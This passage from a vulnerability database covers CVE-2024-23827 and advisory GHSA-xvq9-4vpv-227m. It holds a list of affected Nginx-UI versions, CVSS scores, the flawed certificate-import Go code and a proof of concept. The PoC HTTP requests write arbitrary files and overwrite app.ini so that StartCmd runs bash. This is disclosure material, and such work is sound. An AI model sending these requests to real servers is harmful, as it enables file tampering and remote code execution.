"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "AF6CBAAD-0A17-4E43-965B-C525DADCA3F0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "7EBA5C6E-25FC-4952-BA2C-6C44770D8861",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:-:*:*:*:*:*:*",
"matchCriteriaId": "BDA3575B-E64E-42AD-A12C-ADD2BD61065C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "659E6E9F-A297-4115-884B-C4D7EE2CB155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "4E1A2B34-9B82-429D-83E4-951344B31CAA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "B43B60D3-743D-4965-B0FF-3FBDA3DFB7B1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta4:*:*:*:*:*:*",
"matchCriteriaId": "36DB77DA-4ED4-4800-8251-EB4F4BBA4A1B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta4_fix:*:*:*:*:*:*",
"matchCriteriaId": "E9596AB0-0985-45A3-9EC4-4331A62E59D3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta5:*:*:*:*:*:*",
"matchCriteriaId": "A7659CD3-117A-427A-BDAB-E9580D0CE0A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta6:*:*:*:*:*:*",
"matchCriteriaId": "8D398E64-80C0-4E7F-9BAB-37200FE42EFA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta7:*:*:*:*:*:*",
"matchCriteriaId": "9CF56792-52E6-4A24-8488-8DBCE0DF2E69",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta8:*:*:*:*:*:*",
"matchCriteriaId": "2D59E88D-CFF0-4039-A236-86AEFA9D6135",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.0:beta9:*:*:*:*:*:*",
"matchCriteriaId": "F6C8AFA8-8F62-43A3-99E3-D2BA31B94AF0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "ED48548E-A6AB-4AE7-B70F-540F13FA3171",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.5.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C645D38E-9AF7-4334-96B0-B674A2DD0E01",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.0:-:*:*:*:*:*:*",
"matchCriteriaId": "B3B50213-0F6A-4C86-A819-BC4CEC4CD6A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.0:fix:*:*:*:*:*:*",
"matchCriteriaId": "5EAB6269-238F-4342-BFF3-8D52E068A797",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "830987AC-8021-4898-B031-5D158A2EBFA5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C48387B2-B727-4184-9AEE-F2641F14B96F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "8AF0BF25-8BBD-408E-AD26-2F5A5A7A8799",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.5:*:*:*:*:*:*:*",
"matchCriteriaId": "0E90DD77-C9D3-418B-A77D-6B6513F1B2CD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F01E473A-7007-43B3-8801-4EDCB94433B3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.7:*:*:*:*:*:*:*",
"matchCriteriaId": "BF5C23AA-D701-4153-A798-BC62D2227E4A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.6.8:*:*:*:*:*:*:*",
"matchCriteriaId": "FD3E2589-AA3E-4FBD-9BE0-8C6343AA2D5F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.0:-:*:*:*:*:*:*",
"matchCriteriaId": "3F287D86-DE0B-4EFA-A59B-26142539F4C2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.0:patch:*:*:*:*:*:*",
"matchCriteriaId": "F6CA517E-298A-4594-A5C3-01D714B45FED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E988C01A-A8E8-4A78-86FE-D479E85D1C57",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "F3089766-C08D-46ED-96CD-FBD23918CE91",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7556CA53-63DB-456A-9F4F-D2216577214B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.4:*:*:*:*:*:*:*",
"matchCriteriaId": "ED7D3809-15E2-46D7-B655-872D39516423",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "10DF1FCF-60F0-4E1E-B527-038D62D70061",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.6:*:*:*:*:*:*:*",
"matchCriteriaId": "692F6EB8-A3DA-41D4-ADC0-A62475056CCA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.7:*:*:*:*:*:*:*",
"matchCriteriaId": "DB220C58-FEB5-4D00-856A-B8F02089EC69",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.8:*:*:*:*:*:*:*",
"matchCriteriaId": "3F256AE5-04EC-4F8E-BBC4-76F16736E275",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.7.9:*:*:*:*:*:*:*",
"matchCriteriaId": "C5878D75-96C7-44AB-8982-705FBC2A7825",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2B2FBE3D-3B56-4E56-8156-63FE4F1B8CF0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "00B0C7D6-30BF-4ABD-A72C-795D60DC5CC0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.8.2:*:*:*:*:*:*:*",
"matchCriteriaId": "DC05EA49-627E-4A40-ABB0-E590623C0B90",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.8.3:*:*:*:*:*:*:*",
"matchCriteriaId": "47930D99-B18D-4A65-B49E-060B661919E8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.8.4:-:*:*:*:*:*:*",
"matchCriteriaId": "6C3B1880-D8EB-40CA-B241-02B3C8B49869",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.8.4:patch:*:*:*:*:*:*",
"matchCriteriaId": "E7700F38-C7DD-4F86-B3DE-C3C9A28370A4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.9.9:*:*:*:*:*:*:*",
"matchCriteriaId": "C994DA95-D877-4319-911A-90918A9C566F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.9.9-1:*:*:*:*:*:*:*",
"matchCriteriaId": "3AB27842-9235-4E3D-9E07-5DC873560D35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.9.9-2:*:*:*:*:*:*:*",
"matchCriteriaId": "598FBDD0-E019-4AA5-B561-65B4D1BE084A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.9.9-3:*:*:*:*:*:*:*",
"matchCriteriaId": "489C42D9-39E2-4491-B318-18A20732ED62",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:1.9.9-4:*:*:*:*:*:*:*",
"matchCriteriaId": "0E801BBB-76D3-4873-A431-549FE7DE5451",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "3C287A7F-66B4-406A-B87B-B954A1CA6D44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta10:*:*:*:*:*:*",
"matchCriteriaId": "D684FFEF-4451-49ED-A04D-CF74F45A2F40",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta10_patch:*:*:*:*:*:*",
"matchCriteriaId": "D5984B3A-40C9-4188-976C-E9EB166FA624",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta11:*:*:*:*:*:*",
"matchCriteriaId": "EDE74B22-31D1-41D1-A5DD-DB4AAA7A7984",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "25DD91AC-465B-4A43-A79F-4DE47243741C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "115588C7-D947-4576-9E6C-B5AF1FCE9A29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta4:*:*:*:*:*:*",
"matchCriteriaId": "BBB20EA3-F3CF-42AF-A217-D5DF7A7ADD70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta4_patch:*:*:*:*:*:*",
"matchCriteriaId": "81A6C732-FBF2-44A8-B810-456E54B59A09",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta5:*:*:*:*:*:*",
"matchCriteriaId": "8C5664E5-150E-4B4B-BA0C-420738820FF1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta5_patch:*:*:*:*:*:*",
"matchCriteriaId": "7E764AA1-3060-441F-8F14-ADD165316741",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta6:*:*:*:*:*:*",
"matchCriteriaId": "04A3E84F-91AA-420A-B908-3393E037AC44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta6_patch:*:*:*:*:*:*",
"matchCriteriaId": "828EAE87-24E5-4F31-B301-BA2F96BDEA42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta6_patch2:*:*:*:*:*:*",
"matchCriteriaId": "45710D36-954A-4450-B622-CB0F368DF544",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta7:*:*:*:*:*:*",
"matchCriteriaId": "2B57EEFB-5518-4BD5-998A-34B6690A6F4C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta8:*:*:*:*:*:*",
"matchCriteriaId": "8EDF4CEE-F24D-441B-92A8-7F5A2B41487E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta8_patch:*:*:*:*:*:*",
"matchCriteriaId": "F0275FDF-BAE8-4909-8991-6FCE34B8905E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nginxui:nginx_ui:2.0.0:beta9:*:*:*:*:*:*",
"matchCriteriaId": "B52F973F-A2F2-40C2-9936-9447B5803CFB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It\u0027s possible to leverage the vulnerability into a remote code execution overwriting the config file app.ini. Version 2.0.0.beta.12 fixed the issue."
},
{
"lang": "es",
"value": "Nginx-UI es una interfaz web para administrar configuraciones de Nginx. La funci\u00f3n Import Certificate permite la escritura arbitraria en el sistema. La funci\u00f3n no verifica si la entrada del usuario proporcionada es una certificaci\u00f3n/clave y permite escribir en rutas arbitrarias en el sistema. Es posible aprovechar la vulnerabilidad para ejecutar c\u00f3digo remoto sobrescribiendo el archivo de configuraci\u00f3n app.ini. La versi\u00f3n 2.0.0.beta.12 solucion\u00f3 el problema."
}
],
"id": "CVE-2024-23827",
"lastModified": "2024-02-08T16:42:39.110",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2024-01-29T16:15:09.867",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
}
}
}
ghsa-xvq9-4vpv-227m
Vulnerability from github
Published
2024-01-29 22:30
Modified
2024-07-26 21:45
Severity
9.8 (Critical) - CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.3 (Critical) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
9.3 (Critical) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
Nginx-UI vulnerable to arbitrary file write through the Import Certificate feature
Details
Summary
The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.
https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72
``go
func AddCert(c *gin.Context) {
var json struct {
Name stringjson:"name"SSLCertificatePath stringjson:"ssl_certificate_path" binding:"required"SSLCertificateKeyPath stringjson:"ssl_certificate_key_path" binding:"required"SSLCertificate stringjson:"ssl_certificate"SSLCertificateKey stringjson:"ssl_certificate_key"ChallengeMethod stringjson:"challenge_method"DnsCredentialID intjson:"dns_credential_id"`
}
if !api.BindAndValid(c, &json) {
return
}
certModel := &model.Cert{
Name: json.Name,
SSLCertificatePath: json.SSLCertificatePath,
SSLCertificateKeyPath: json.SSLCertificateKeyPath,
ChallengeMethod: json.ChallengeMethod,
DnsCredentialID: json.DnsCredentialID,
}
err := certModel.Insert()
if err != nil {
api.ErrHandler(c, err)
return
}
content := &cert.Content{
SSLCertificatePath: json.SSLCertificatePath,
SSLCertificateKeyPath: json.SSLCertificateKeyPath,
SSLCertificate: json.SSLCertificate,
SSLCertificateKey: json.SSLCertificateKey,
}
err = content.WriteFile()
if err != nil {
api.ErrHandler(c, err)
return
}
c.JSON(http.StatusOK, Transformer(certModel))
}
``` https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15
```go func (c *Content) WriteFile() (err error) { // MkdirAll creates a directory named path, along with any necessary parents, // and returns nil, or else returns an error. // The permission bits perm (before umask) are used for all directories that MkdirAll creates. // If path is already a directory, MkdirAll does nothing and returns nil.
err = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)
if err != nil {
return
}
err = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)
if err != nil {
return
}
if c.SSLCertificate != "" {
err = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)
if err != nil {
return
}
}
if c.SSLCertificateKey != "" {
err = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)
if err != nil {
return
}
}
return
} ```
PoC
```
POST /api/cert HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 144
Accept: application/json, text/plain, /
Authorization:
{"name":"poc","ssl_certificate_path":"/tmp/test","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"test","ssl_certificate_key":"test2"} ```
bash
root@aze:~/nginx# ls -la /tmp/test*
-rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test
-rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2
It's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.
bash
root@aze:~/nginx# cat app.ini | grep "StartCmd"
StartCmd = login
Then we overwrite the StartCmd with bash
```
POST /api/cert HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 980
Accept: application/json, text/plain, /
Authorization:
{"name":"poc","ssl_certificate_path":"/root/nginx/app.ini","ssl_certificate_key_path":"/tmp/test2","ssl_certificate":"[server]\r\nHttpHost = 0.0.0.0\r\nHttpPort = 9000\r\nRunMode = debug\r\nJwtSecret = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\r\nNodeSecret = 139ab224-9e9e-444f-987e-b3a651175ad5\r\nHTTPChallengePort = 9180\r\nEmail = props@pros.com\r\nDatabase = database\r\nStartCmd = bash\r\nCADir = dqsdqsd\r\nDemo = false\r\nPageSize = 10\r\nGithubProxy = dqsdqfsdfsdfsdfsd\r\n\r\n[nginx]\r\nAccessLogPath =\r\nErrorLogPath =\r\nConfigDir =\r\nPIDPath =\r\nTestConfigCmd =\r\nReloadCmd =\r\nRestartCmd =\r\n\r\n[openai]\r\nBaseUrl = \r\nToken =\r\nProxy =\r\nModel = \r\n\r\n[casdoor]\r\nEndpoint =\r\nClientId =\r\nClientSecret =\r\nCertificate =\r\nOrganization =\r\nApplication =\r\nRedirectUri =","ssl_certificate_key":"test2"} ```
bash
root@aze:~/nginx# cat app.ini | grep "StartCmd"
StartCmd = bash
For the new config to be applied the app needs to be restarted
Impact
Arbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/0xJacky/Nginx-UI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.0-beta.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-23827"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-29T22:30:18Z",
"nvd_published_at": "2024-01-29T16:15:09Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nThe Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.\n\nhttps://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72\n\n```go\nfunc AddCert(c *gin.Context) {\n\tvar json struct {\n\t\tName string `json:\"name\"`\n\t\tSSLCertificatePath string `json:\"ssl_certificate_path\" binding:\"required\"`\n\t\tSSLCertificateKeyPath string `json:\"ssl_certificate_key_path\" binding:\"required\"`\n\t\tSSLCertificate string `json:\"ssl_certificate\"`\n\t\tSSLCertificateKey string `json:\"ssl_certificate_key\"`\n\t\tChallengeMethod string `json:\"challenge_method\"`\n\t\tDnsCredentialID int `json:\"dns_credential_id\"`\n\t}\n\tif !api.BindAndValid(c, \u0026json) {\n\t\treturn\n\t}\n\tcertModel := \u0026model.Cert{\n\t\tName: json.Name,\n\t\tSSLCertificatePath: json.SSLCertificatePath,\n\t\tSSLCertificateKeyPath: json.SSLCertificateKeyPath,\n\t\tChallengeMethod: json.ChallengeMethod,\n\t\tDnsCredentialID: json.DnsCredentialID,\n\t}\n\n\terr := certModel.Insert()\n\n\tif err != nil {\n\t\tapi.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\tcontent := \u0026cert.Content{\n\t\tSSLCertificatePath: json.SSLCertificatePath,\n\t\tSSLCertificateKeyPath: json.SSLCertificateKeyPath,\n\t\tSSLCertificate: json.SSLCertificate,\n\t\tSSLCertificateKey: json.SSLCertificateKey,\n\t}\n\n\terr = content.WriteFile()\n\n\tif err != nil {\n\t\tapi.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\tc.JSON(http.StatusOK, Transformer(certModel))\n}\n\n```\nhttps://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15\n\n```go\nfunc (c *Content) WriteFile() (err error) {\n\t// MkdirAll creates a directory named path, along with any necessary parents,\n\t// and returns nil, or else returns an error.\n\t// The permission bits perm (before umask) are used for all directories that MkdirAll creates.\n\t// If path is already a directory, MkdirAll does nothing and returns nil.\n\n\terr = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif c.SSLCertificate != \"\" {\n\t\terr = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\tif c.SSLCertificateKey != \"\" {\n\t\terr = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\treturn\n}\n```\n\n\n### PoC\n\n```\nPOST /api/cert HTTP/1.1\nHost: 127.0.0.1:9000\nContent-Length: 144\nAccept: application/json, text/plain, */*\nAuthorization: \u003cJWT\u003e\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7\nConnection: close\n\n{\"name\":\"poc\",\"ssl_certificate_path\":\"/tmp/test\",\"ssl_certificate_key_path\":\"/tmp/test2\",\"ssl_certificate\":\"test\",\"ssl_certificate_key\":\"test2\"}\n```\n\n```bash\nroot@aze:~/nginx# ls -la /tmp/test*\n-rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test\n-rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2\n```\n\nIt\u0027s possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.\n\n```bash\nroot@aze:~/nginx# cat app.ini | grep \"StartCmd\"\nStartCmd = login\n```\nThen we overwrite the `StartCmd` with `bash`\n\n```\nPOST /api/cert HTTP/1.1\nHost: 127.0.0.1:9000\nContent-Length: 980\nAccept: application/json, text/plain, */*\nAuthorization: \u003cJWT\u003e\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7\nConnection: close\n\n{\"name\":\"poc\",\"ssl_certificate_path\":\"/root/nginx/app.ini\",\"ssl_certificate_key_path\":\"/tmp/test2\",\"ssl_certificate\":\"[server]\\r\\nHttpHost = 0.0.0.0\\r\\nHttpPort = 9000\\r\\nRunMode = debug\\r\\nJwtSecret = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\\r\\nNodeSecret = 139ab224-9e9e-444f-987e-b3a651175ad5\\r\\nHTTPChallengePort = 9180\\r\\nEmail = props@pros.com\\r\\nDatabase = database\\r\\nStartCmd = bash\\r\\nCADir = dqsdqsd\\r\\nDemo = false\\r\\nPageSize = 10\\r\\nGithubProxy = dqsdqfsdfsdfsdfsd\\r\\n\\r\\n[nginx]\\r\\nAccessLogPath =\\r\\nErrorLogPath =\\r\\nConfigDir =\\r\\nPIDPath =\\r\\nTestConfigCmd =\\r\\nReloadCmd =\\r\\nRestartCmd =\\r\\n\\r\\n[openai]\\r\\nBaseUrl = \\r\\nToken =\\r\\nProxy =\\r\\nModel = \\r\\n\\r\\n[casdoor]\\r\\nEndpoint =\\r\\nClientId =\\r\\nClientSecret =\\r\\nCertificate =\\r\\nOrganization =\\r\\nApplication =\\r\\nRedirectUri =\",\"ssl_certificate_key\":\"test2\"}\n```\n\n```bash\nroot@aze:~/nginx# cat app.ini | grep \"StartCmd\"\nStartCmd = bash\n```\n\nFor the new config to be applied the app needs to be restarted\n\n\n\n\n\n### Impact\n\nArbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.",
"id": "GHSA-xvq9-4vpv-227m",
"modified": "2024-07-26T21:45:30Z",
"published": "2024-01-29T22:30:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23827"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/commit/8581bdd3c6f49ab345b773517ba9173fa7fc6199"
},
{
"type": "PACKAGE",
"url": "https://github.com/0xJacky/nginx-ui"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Nginx-UI vulnerable to arbitrary file write through the Import Certificate feature"
}
Loading...